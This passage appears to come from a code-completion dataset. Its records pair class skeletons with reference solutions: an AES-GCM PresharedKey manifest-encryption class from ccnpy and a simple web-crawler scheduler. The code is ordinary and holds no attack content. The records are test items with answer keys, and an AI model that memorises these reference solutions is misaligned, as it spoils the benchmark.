plaintext=plaintext, associated_data=security_ctx.serialize())\nencrypted_node = ccnpy.flic.EncryptedNode(ciphertext)\nauth_tag = ccnpy.flic.AuthTag(a)\nreturn (security_ctx, encrypted_node, auth_tag)", "security_ctx, encrypted_node, auth_tag = self.encrypt(node)\nmanifest = ccnpy.flic.Manifest(security_ctx=security_ctx, node=encrypted_node, auth_tag=auth_tag)\nreturn manifest", "if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('encrypted_node must be ccnpy.flic.EncryptedNode')\nif security_ctx is None:\n raise ValueError('security context must not be None')\nif not isinstance(security_ctx, ccnpy.flic.presharedkey.PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\nif auth_tag is None:\n raise ValueError('auth_tag must not be None')\nif not isinstance(auth_tag, ccnpy.flic.AuthTag):\n raise TypeError('auth_tag must be ccnpy.flic.AuthTag')\nif security_ctx.key_number() != self._key_number:\n raise ValueError('security_ctx.key_number %r != our key_number %r' % (security_ctx.key_number(), self._key_number))\nplaintext = self._key.decrypt(nonce=security_ctx.iv(), ciphertext=encrypted_node.value(), associated_data=security_ctx.serialize(), auth_tag=auth_tag.value())\nnode_tlv = ccnpy.Tlv(ccnpy.flic.Node.class_type(), plaintext)\nnode = ccnpy.flic.Node.parse(node_tlv)\nreturn node", "if not isinstance(encrypted_manifest, ccnpy.flic.Manifest):\n raise TypeError('encrypted_manifest must be ccnpy.flic.Manifest')\nsecurity_ctx = encrypted_manifest.security_ctx()\nencrypted_node = encrypted_manifest.node()\nauth_tag = encrypted_manifest.auth_tag()\nif not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('manifest did not contain an encrypted node')\nif security_ctx is None:\n raise ValueError('security context must not be None')\nif not isinstance(security_ctx, PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\nif auth_tag is None:\n raise ValueError('auth_tag must not be None')\nnode = self.decrypt_node(security_ctx=security_ctx, encrypted_node=encrypted_node, auth_tag=auth_tag)\nmanifest = ccnpy.flic.Manifest(node=node)\nreturn manifest"], "bodies_text": "<|body_start_0|>\n if not isinstance(key, ccnpy.crypto.AesGcmKey):\n raise TypeError('key must be ccnpy.crypto.AesGcmKey')\n self._key = key\n self._key_number = key_number\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(node, ccnpy.flic.Node):\n raise TypeError('node must be ccnpy.flic.Node')\n plaintext = node.serialized_value()\n iv = self._key.nonce()\n security_ctx = None\n if len(self._key) == 128:\n security_ctx = PresharedKeyCtx.create_aes_gcm_128(key_number=self._key_number, iv=iv)\n elif len(self._key) == 256:\n security_ctx = PresharedKeyCtx.create_aes_gcm_256(key_number=self._key_number, iv=iv)\n else:\n raise ValueError('Unsupported key length %r' % len(self._key))\n ciphertext, a = self._key.encrypt(nonce=iv, plaintext=plaintext, associated_data=security_ctx.serialize())\n encrypted_node = ccnpy.flic.EncryptedNode(ciphertext)\n auth_tag = ccnpy.flic.AuthTag(a)\n return (security_ctx, encrypted_node, auth_tag)\n<|end_body_1|>\n\n<|body_start_2|>\n security_ctx, encrypted_node, auth_tag = self.encrypt(node)\n manifest = ccnpy.flic.Manifest(security_ctx=security_ctx, node=encrypted_node, auth_tag=auth_tag)\n return manifest\n<|end_body_2|>\n\n<|body_start_3|>\n if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('encrypted_node must be ccnpy.flic.EncryptedNode')\n if security_ctx is None:\n raise ValueError('security context must not be None')\n if not isinstance(security_ctx, ccnpy.flic.presharedkey.PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\n if auth_tag is None:\n raise ValueError('auth_tag must not be None')\n if not isinstance(auth_tag, ccnpy.flic.AuthTag):\n raise TypeError('auth_tag must be ccnpy.flic.AuthTag')\n if security_ctx.key_number() != self._key_number:\n raise ValueError('security_ctx.key_number %r != our key_number %r' % (security_ctx.key_number(), self._key_number))\n plaintext = self._key.decrypt(nonce=security_ctx.iv(), ciphertext=encrypted_node.value(), associated_data=security_ctx.serialize(), auth_tag=auth_tag.value())\n node_tlv = ccnpy.Tlv(ccnpy.flic.Node.class_type(), plaintext)\n node = ccnpy.flic.Node.parse(node_tlv)\n return node\n<|end_body_3|>\n\n<|body_start_4|>\n if not isinstance(encrypted_manifest, ccnpy.flic.Manifest):\n raise TypeError('encrypted_manifest must be ccnpy.flic.Manifest')\n security_ctx = encrypted_manifest.security_ctx()\n encrypted_node = encrypted_manifest.node()\n auth_tag = encrypted_manifest.auth_tag()\n if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('manifest did not contain an encrypted node')\n if security_ctx is None:\n raise ValueError('security context must not be None')\n if not isinstance(security_ctx, PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\n if auth_tag is None:\n raise ValueError('auth_tag must not be None')\n node = self.decrypt_node(security_ctx=security_ctx, encrypted_node=encrypted_node, auth_tag=auth_tag)\n manifest = ccnpy.flic.Manifest(node=node)\n return manifest\n<|end_body_4|>\n", "class_docstring": "The PresharedKey algorithm. Typically, you will use `PresharedKey.create_manifest(...)` to create a Manifest TLV out of a ccnpy.flic.Node.", "class_name": "PresharedKey", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PresharedKey:\n \"\"\"The PresharedKey algorithm. Typically, you will use `PresharedKey.create_manifest(...)` to create a Manifest TLV out of a ccnpy.flic.Node.\"\"\"\n\n def __init__(self, key, key_number):\n \"\"\":param key: A ccnpy.crypto.AesGcmKey :param key_number: An integer used to reference the key\"\"\"\n <|body_0|>\n\n def encrypt(self, node):\n \"\"\":param node: A ccnpy.flic.Node :return: (security_ctx, encrypted_node, auth_tag)\"\"\"\n <|body_1|>\n\n def create_encrypted_manifest(self, node):\n \"\"\":param node: A ccnpy.flic.Node to encrypt and wrap in a Manifest :return: A ccnpy.flic.Manifest\"\"\"\n <|body_2|>\n\n def decrypt_node(self, security_ctx, encrypted_node, auth_tag):\n \"\"\"Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) node = psk.decrypt_node(manifest.security_ctx(), manifest.node(), manifest.auth_tag()) :param security_ctx: A ccnpy.flic.PresharedKeyCtx :param encrypted_node: A ccnpy.flic.EncryptedNode :param auth_tag: A ccnpy.flic.AuthTag :return: a ccnpy.flic.Node\"\"\"\n <|body_3|>\n\n def decrypt_manifest(self, encrypted_manifest):\n \"\"\"Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) manifest = psk.decrypt_to_manifest(manifest) :param encrypted_manifest: :return: A decrypted manifest\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not isinstance(key, ccnpy.crypto.AesGcmKey):\n raise TypeError('key must be ccnpy.crypto.AesGcmKey')\n self._key = key\n self._key_number = key_number\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(node, ccnpy.flic.Node):\n raise TypeError('node must be ccnpy.flic.Node')\n plaintext = node.serialized_value()\n iv = self._key.nonce()\n security_ctx = None\n if len(self._key) == 128:\n security_ctx = PresharedKeyCtx.create_aes_gcm_128(key_number=self._key_number, iv=iv)\n elif len(self._key) == 256:\n security_ctx = PresharedKeyCtx.create_aes_gcm_256(key_number=self._key_number, iv=iv)\n else:\n raise ValueError('Unsupported key length %r' % len(self._key))\n ciphertext, a = self._key.encrypt(nonce=iv, plaintext=plaintext, associated_data=security_ctx.serialize())\n encrypted_node = ccnpy.flic.EncryptedNode(ciphertext)\n auth_tag = ccnpy.flic.AuthTag(a)\n return (security_ctx, encrypted_node, auth_tag)\n<|end_body_1|>\n\n<|body_start_2|>\n security_ctx, encrypted_node, auth_tag = self.encrypt(node)\n manifest = ccnpy.flic.Manifest(security_ctx=security_ctx, node=encrypted_node, auth_tag=auth_tag)\n return manifest\n<|end_body_2|>\n\n<|body_start_3|>\n if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('encrypted_node must be ccnpy.flic.EncryptedNode')\n if security_ctx is None:\n raise ValueError('security context must not be None')\n if not isinstance(security_ctx, ccnpy.flic.presharedkey.PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\n if auth_tag is None:\n raise ValueError('auth_tag must not be None')\n if not isinstance(auth_tag, ccnpy.flic.AuthTag):\n raise TypeError('auth_tag must be ccnpy.flic.AuthTag')\n if security_ctx.key_number() != self._key_number:\n raise ValueError('security_ctx.key_number %r != our key_number %r' % (security_ctx.key_number(), self._key_number))\n plaintext = self._key.decrypt(nonce=security_ctx.iv(), ciphertext=encrypted_node.value(), associated_data=security_ctx.serialize(), auth_tag=auth_tag.value())\n node_tlv = ccnpy.Tlv(ccnpy.flic.Node.class_type(), plaintext)\n node = ccnpy.flic.Node.parse(node_tlv)\n return node\n<|end_body_3|>\n\n<|body_start_4|>\n if not isinstance(encrypted_manifest, ccnpy.flic.Manifest):\n raise TypeError('encrypted_manifest must be ccnpy.flic.Manifest')\n security_ctx = encrypted_manifest.security_ctx()\n encrypted_node = encrypted_manifest.node()\n auth_tag = encrypted_manifest.auth_tag()\n if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('manifest did not contain an encrypted node')\n if security_ctx is None:\n raise ValueError('security context must not be None')\n if not isinstance(security_ctx, PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\n if auth_tag is None:\n raise ValueError('auth_tag must not be None')\n node = self.decrypt_node(security_ctx=security_ctx, encrypted_node=encrypted_node, auth_tag=auth_tag)\n manifest = ccnpy.flic.Manifest(node=node)\n return manifest\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000023", "length_bytes": 6382, "license_type": "permissive", "methods": [{"docstring": ":param key: A ccnpy.crypto.AesGcmKey :param key_number: An integer used to reference the key", "name": "__init__", "signature": "def __init__(self, key, key_number)"}, {"docstring": ":param node: A ccnpy.flic.Node :return: (security_ctx, encrypted_node, auth_tag)", "name": "encrypt", "signature": "def encrypt(self, node)"}, {"docstring": ":param node: A ccnpy.flic.Node to encrypt and wrap in a Manifest :return: A ccnpy.flic.Manifest", "name": "create_encrypted_manifest", "signature": "def create_encrypted_manifest(self, node)"}, {"docstring": "Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) node = psk.decrypt_node(manifest.security_ctx(), manifest.node(), manifest.auth_tag()) :param security_ctx: A ccnpy.flic.PresharedKeyCtx :param encrypted_node: A ccnpy.flic.EncryptedNode :param auth_tag: A ccnpy.flic.AuthTag :return: a ccnpy.flic.Node", "name": "decrypt_node", "signature": "def decrypt_node(self, security_ctx, encrypted_node, auth_tag)"}, {"docstring": "Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) manifest = psk.decrypt_to_manifest(manifest) :param encrypted_manifest: :return: A decrypted manifest", "name": "decrypt_manifest", "signature": "def decrypt_manifest(self, encrypted_manifest)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_002804", "prompt": "Implement the Python class `PresharedKey` described below.\n\nClass description:\nThe PresharedKey algorithm. Typically, you will use `PresharedKey.create_manifest(...)` to create a Manifest TLV out of a ccnpy.flic.Node.\n\nMethod signatures and docstrings:\n- def __init__(self, key, key_number): :param key: A ccnpy.crypto.AesGcmKey :param key_number: An integer used to reference the key\n- def encrypt(self, node): :param node: A ccnpy.flic.Node :return: (security_ctx, encrypted_node, auth_tag)\n- def create_encrypted_manifest(self, node): :param node: A ccnpy.flic.Node to encrypt and wrap in a Manifest :return: A ccnpy.flic.Manifest\n- def decrypt_node(self, security_ctx, encrypted_node, auth_tag): Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) node = psk.decrypt_node(manifest.security_ctx(), manifest.node(), manifest.auth_tag()) :param security_ctx: A ccnpy.flic.PresharedKeyCtx :param encrypted_node: A ccnpy.flic.EncryptedNode :param auth_tag: A ccnpy.flic.AuthTag :return: a ccnpy.flic.Node\n- def decrypt_manifest(self, encrypted_manifest): Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) manifest = psk.decrypt_to_manifest(manifest) :param encrypted_manifest: :return: A decrypted manifest", "prompted_full_text": "Implement the Python class `PresharedKey` described below.\n\nClass description:\nThe PresharedKey algorithm. Typically, you will use `PresharedKey.create_manifest(...)` to create a Manifest TLV out of a ccnpy.flic.Node.\n\nMethod signatures and docstrings:\n- def __init__(self, key, key_number): :param key: A ccnpy.crypto.AesGcmKey :param key_number: An integer used to reference the key\n- def encrypt(self, node): :param node: A ccnpy.flic.Node :return: (security_ctx, encrypted_node, auth_tag)\n- def create_encrypted_manifest(self, node): :param node: A ccnpy.flic.Node to encrypt and wrap in a Manifest :return: A ccnpy.flic.Manifest\n- def decrypt_node(self, security_ctx, encrypted_node, auth_tag): Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) node = psk.decrypt_node(manifest.security_ctx(), manifest.node(), manifest.auth_tag()) :param security_ctx: A ccnpy.flic.PresharedKeyCtx :param encrypted_node: A ccnpy.flic.EncryptedNode :param auth_tag: A ccnpy.flic.AuthTag :return: a ccnpy.flic.Node\n- def decrypt_manifest(self, encrypted_manifest): Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) manifest = psk.decrypt_to_manifest(manifest) :param encrypted_manifest: :return: A decrypted manifest\n\n<|skeleton|>\nclass PresharedKey:\n \"\"\"The PresharedKey algorithm. Typically, you will use `PresharedKey.create_manifest(...)` to create a Manifest TLV out of a ccnpy.flic.Node.\"\"\"\n\n def __init__(self, key, key_number):\n \"\"\":param key: A ccnpy.crypto.AesGcmKey :param key_number: An integer used to reference the key\"\"\"\n <|body_0|>\n\n def encrypt(self, node):\n \"\"\":param node: A ccnpy.flic.Node :return: (security_ctx, encrypted_node, auth_tag)\"\"\"\n <|body_1|>\n\n def create_encrypted_manifest(self, node):\n \"\"\":param node: A ccnpy.flic.Node to encrypt and wrap in a Manifest :return: A ccnpy.flic.Manifest\"\"\"\n <|body_2|>\n\n def decrypt_node(self, security_ctx, encrypted_node, auth_tag):\n \"\"\"Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) node = psk.decrypt_node(manifest.security_ctx(), manifest.node(), manifest.auth_tag()) :param security_ctx: A ccnpy.flic.PresharedKeyCtx :param encrypted_node: A ccnpy.flic.EncryptedNode :param auth_tag: A ccnpy.flic.AuthTag :return: a ccnpy.flic.Node\"\"\"\n <|body_3|>\n\n def decrypt_manifest(self, encrypted_manifest):\n \"\"\"Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) manifest = psk.decrypt_to_manifest(manifest) :param encrypted_manifest: :return: A decrypted manifest\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not isinstance(key, ccnpy.crypto.AesGcmKey):\n raise TypeError('key must be ccnpy.crypto.AesGcmKey')\n self._key = key\n self._key_number = key_number\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(node, ccnpy.flic.Node):\n raise TypeError('node must be ccnpy.flic.Node')\n plaintext = node.serialized_value()\n iv = self._key.nonce()\n security_ctx = None\n if len(self._key) == 128:\n security_ctx = PresharedKeyCtx.create_aes_gcm_128(key_number=self._key_number, iv=iv)\n elif len(self._key) == 256:\n security_ctx = PresharedKeyCtx.create_aes_gcm_256(key_number=self._key_number, iv=iv)\n else:\n raise ValueError('Unsupported key length %r' % len(self._key))\n ciphertext, a = self._key.encrypt(nonce=iv, plaintext=plaintext, associated_data=security_ctx.serialize())\n encrypted_node = ccnpy.flic.EncryptedNode(ciphertext)\n auth_tag = ccnpy.flic.AuthTag(a)\n return (security_ctx, encrypted_node, auth_tag)\n<|end_body_1|>\n\n<|body_start_2|>\n security_ctx, encrypted_node, auth_tag = self.encrypt(node)\n manifest = ccnpy.flic.Manifest(security_ctx=security_ctx, node=encrypted_node, auth_tag=auth_tag)\n return manifest\n<|end_body_2|>\n\n<|body_start_3|>\n if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('encrypted_node must be ccnpy.flic.EncryptedNode')\n if security_ctx is None:\n raise ValueError('security context must not be None')\n if not isinstance(security_ctx, ccnpy.flic.presharedkey.PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\n if auth_tag is None:\n raise ValueError('auth_tag must not be None')\n if not isinstance(auth_tag, ccnpy.flic.AuthTag):\n raise TypeError('auth_tag must be ccnpy.flic.AuthTag')\n if security_ctx.key_number() != self._key_number:\n raise ValueError('security_ctx.key_number %r != our key_number %r' % (security_ctx.key_number(), self._key_number))\n plaintext = self._key.decrypt(nonce=security_ctx.iv(), ciphertext=encrypted_node.value(), associated_data=security_ctx.serialize(), auth_tag=auth_tag.value())\n node_tlv = ccnpy.Tlv(ccnpy.flic.Node.class_type(), plaintext)\n node = ccnpy.flic.Node.parse(node_tlv)\n return node\n<|end_body_3|>\n\n<|body_start_4|>\n if not isinstance(encrypted_manifest, ccnpy.flic.Manifest):\n raise TypeError('encrypted_manifest must be ccnpy.flic.Manifest')\n security_ctx = encrypted_manifest.security_ctx()\n encrypted_node = encrypted_manifest.node()\n auth_tag = encrypted_manifest.auth_tag()\n if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('manifest did not contain an encrypted node')\n if security_ctx is None:\n raise ValueError('security context must not be None')\n if not isinstance(security_ctx, PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\n if auth_tag is None:\n raise ValueError('auth_tag must not be None')\n node = self.decrypt_node(security_ctx=security_ctx, encrypted_node=encrypted_node, auth_tag=auth_tag)\n manifest = ccnpy.flic.Manifest(node=node)\n return manifest\n<|end_body_4|>\n", "revision_id": "20d982e2e3845818fde7f3facdc8cbcdff323dbb", "skeleton": "<|skeleton|>\nclass PresharedKey:\n \"\"\"The PresharedKey algorithm. Typically, you will use `PresharedKey.create_manifest(...)` to create a Manifest TLV out of a ccnpy.flic.Node.\"\"\"\n\n def __init__(self, key, key_number):\n \"\"\":param key: A ccnpy.crypto.AesGcmKey :param key_number: An integer used to reference the key\"\"\"\n <|body_0|>\n\n def encrypt(self, node):\n \"\"\":param node: A ccnpy.flic.Node :return: (security_ctx, encrypted_node, auth_tag)\"\"\"\n <|body_1|>\n\n def create_encrypted_manifest(self, node):\n \"\"\":param node: A ccnpy.flic.Node to encrypt and wrap in a Manifest :return: A ccnpy.flic.Manifest\"\"\"\n <|body_2|>\n\n def decrypt_node(self, security_ctx, encrypted_node, auth_tag):\n \"\"\"Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) node = psk.decrypt_node(manifest.security_ctx(), manifest.node(), manifest.auth_tag()) :param security_ctx: A ccnpy.flic.PresharedKeyCtx :param encrypted_node: A ccnpy.flic.EncryptedNode :param auth_tag: A ccnpy.flic.AuthTag :return: a ccnpy.flic.Node\"\"\"\n <|body_3|>\n\n def decrypt_manifest(self, encrypted_manifest):\n \"\"\"Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) manifest = psk.decrypt_to_manifest(manifest) :param encrypted_manifest: :return: A decrypted manifest\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PresharedKey:\n \"\"\"The PresharedKey algorithm. Typically, you will use `PresharedKey.create_manifest(...)` to create a Manifest TLV out of a ccnpy.flic.Node.\"\"\"\n\n def __init__(self, key, key_number):\n \"\"\":param key: A ccnpy.crypto.AesGcmKey :param key_number: An integer used to reference the key\"\"\"\n if not isinstance(key, ccnpy.crypto.AesGcmKey):\n raise TypeError('key must be ccnpy.crypto.AesGcmKey')\n self._key = key\n self._key_number = key_number\n\n def encrypt(self, node):\n \"\"\":param node: A ccnpy.flic.Node :return: (security_ctx, encrypted_node, auth_tag)\"\"\"\n if not isinstance(node, ccnpy.flic.Node):\n raise TypeError('node must be ccnpy.flic.Node')\n plaintext = node.serialized_value()\n iv = self._key.nonce()\n security_ctx = None\n if len(self._key) == 128:\n security_ctx = PresharedKeyCtx.create_aes_gcm_128(key_number=self._key_number, iv=iv)\n elif len(self._key) == 256:\n security_ctx = PresharedKeyCtx.create_aes_gcm_256(key_number=self._key_number, iv=iv)\n else:\n raise ValueError('Unsupported key length %r' % len(self._key))\n ciphertext, a = self._key.encrypt(nonce=iv, plaintext=plaintext, associated_data=security_ctx.serialize())\n encrypted_node = ccnpy.flic.EncryptedNode(ciphertext)\n auth_tag = ccnpy.flic.AuthTag(a)\n return (security_ctx, encrypted_node, auth_tag)\n\n def create_encrypted_manifest(self, node):\n \"\"\":param node: A ccnpy.flic.Node to encrypt and wrap in a Manifest :return: A ccnpy.flic.Manifest\"\"\"\n security_ctx, encrypted_node, auth_tag = self.encrypt(node)\n manifest = ccnpy.flic.Manifest(security_ctx=security_ctx, node=encrypted_node, auth_tag=auth_tag)\n return manifest\n\n def decrypt_node(self, security_ctx, encrypted_node, auth_tag):\n \"\"\"Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) node = psk.decrypt_node(manifest.security_ctx(), manifest.node(), manifest.auth_tag()) :param security_ctx: A ccnpy.flic.PresharedKeyCtx :param encrypted_node: A ccnpy.flic.EncryptedNode :param auth_tag: A ccnpy.flic.AuthTag :return: a ccnpy.flic.Node\"\"\"\n if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('encrypted_node must be ccnpy.flic.EncryptedNode')\n if security_ctx is None:\n raise ValueError('security context must not be None')\n if not isinstance(security_ctx, ccnpy.flic.presharedkey.PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\n if auth_tag is None:\n raise ValueError('auth_tag must not be None')\n if not isinstance(auth_tag, ccnpy.flic.AuthTag):\n raise TypeError('auth_tag must be ccnpy.flic.AuthTag')\n if security_ctx.key_number() != self._key_number:\n raise ValueError('security_ctx.key_number %r != our key_number %r' % (security_ctx.key_number(), self._key_number))\n plaintext = self._key.decrypt(nonce=security_ctx.iv(), ciphertext=encrypted_node.value(), associated_data=security_ctx.serialize(), auth_tag=auth_tag.value())\n node_tlv = ccnpy.Tlv(ccnpy.flic.Node.class_type(), plaintext)\n node = ccnpy.flic.Node.parse(node_tlv)\n return node\n\n def decrypt_manifest(self, encrypted_manifest):\n \"\"\"Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) manifest = psk.decrypt_to_manifest(manifest) :param encrypted_manifest: :return: A decrypted manifest\"\"\"\n if not isinstance(encrypted_manifest, ccnpy.flic.Manifest):\n raise TypeError('encrypted_manifest must be ccnpy.flic.Manifest')\n security_ctx = encrypted_manifest.security_ctx()\n encrypted_node = encrypted_manifest.node()\n auth_tag = encrypted_manifest.auth_tag()\n if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('manifest did not contain an encrypted node')\n if security_ctx is None:\n raise ValueError('security context must not be None')\n if not isinstance(security_ctx, PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\n if auth_tag is None:\n raise ValueError('auth_tag must not be None')\n node = self.decrypt_node(security_ctx=security_ctx, encrypted_node=encrypted_node, auth_tag=auth_tag)\n manifest = ccnpy.flic.Manifest(node=node)\n return manifest\n", "source": "the_stack_v2_python_sparse", "source_path": "ccnpy/flic/presharedkey/PresharedKey.py", "source_repo": "mmosko/ccnpy", "split": "test", "star_events_count": 1} {"blob_id": "49351ca26b81f564b6f4ca7db0dafa3445807fc6", "bodies": ["self.urls = urls.Urls()\nself.parserHTML = Parser()\nself.output = Output()", "self.urls.add_new_url(root_url)\nwhile self.urls.get_new_urls_length() > 0:\n try:\n url = self.urls.get_new_url()\n flag, content = download.download(url)\n if flag:\n links, datas = self.parserHTML.parser_html(url, content)\n self.urls.add_new_urls(links)\n self.output.store_datas(datas)\n else:\n print(content)\n except Exception as e:\n print(e, 'crawler fail')\nself.output.to_html()"], "bodies_text": "<|body_start_0|>\n self.urls = urls.Urls()\n self.parserHTML = Parser()\n self.output = Output()\n<|end_body_0|>\n\n<|body_start_1|>\n self.urls.add_new_url(root_url)\n while self.urls.get_new_urls_length() > 0:\n try:\n url = self.urls.get_new_url()\n flag, content = download.download(url)\n if flag:\n links, datas = self.parserHTML.parser_html(url, content)\n self.urls.add_new_urls(links)\n self.output.store_datas(datas)\n else:\n print(content)\n except Exception as e:\n print(e, 'crawler fail')\n self.output.to_html()\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Scheduler", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Scheduler:\n\n def __init__(self):\n \"\"\"初始化调度器\"\"\"\n <|body_0|>\n\n def crawler(self, root_url):\n \"\"\"根据入口文件,开始爬取需要的内容和urls :param root_url: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.urls = urls.Urls()\n self.parserHTML = Parser()\n self.output = Output()\n<|end_body_0|>\n\n<|body_start_1|>\n self.urls.add_new_url(root_url)\n while self.urls.get_new_urls_length() > 0:\n try:\n url = self.urls.get_new_url()\n flag, content = download.download(url)\n if flag:\n links, datas = self.parserHTML.parser_html(url, content)\n self.urls.add_new_urls(links)\n self.output.store_datas(datas)\n else:\n print(content)\n except Exception as e:\n print(e, 'crawler fail')\n self.output.to_html()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000024", "length_bytes": 3453, "license_type": "permissive", "methods": [{"docstring": "初始化调度器", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "根据入口文件,开始爬取需要的内容和urls :param root_url: :return:", "name": "crawler", "signature": "def crawler(self, root_url)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002526", "prompt": "Implement the Python class `Scheduler` described below.\n\nClass description:\nImplement the Scheduler class.\n\nMethod signatures and docstrings:\n- def __init__(self): 初始化调度器\n- def crawler(self, root_url): 根据入口文件,开始爬取需要的内容和urls :param root_url: :return:", "prompted_full_text": "Implement the Python class `Scheduler` described below.\n\nClass description:\nImplement the Scheduler class.\n\nMethod signatures and docstrings:\n- def __init__(self): 初始化调度器\n- def crawler(self, root_url): 根据入口文件,开始爬取需要的内容和urls :param root_url: :return:\n\n<|skeleton|>\nclass Scheduler:\n\n def __init__(self):\n \"\"\"初始化调度器\"\"\"\n <|body_0|>\n\n def crawler(self, root_url):\n \"\"\"根据入口文件,开始爬取需要的内容和urls :param root_url: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.urls = urls.Urls()\n self.parserHTML = Parser()\n self.output = Output()\n<|end_body_0|>\n\n<|body_start_1|>\n self.urls.add_new_url(root_url)\n while self.urls.get_new_urls_length() > 0:\n try:\n url = self.urls.get_new_url()\n flag, content = download.download(url)\n if flag:\n links, datas = self.parserHTML.parser_html(url, content)\n self.urls.add_new_urls(links)\n self.output.store_datas(datas)\n else:\n print(content)\n except Exception as e:\n print(e, 'crawler 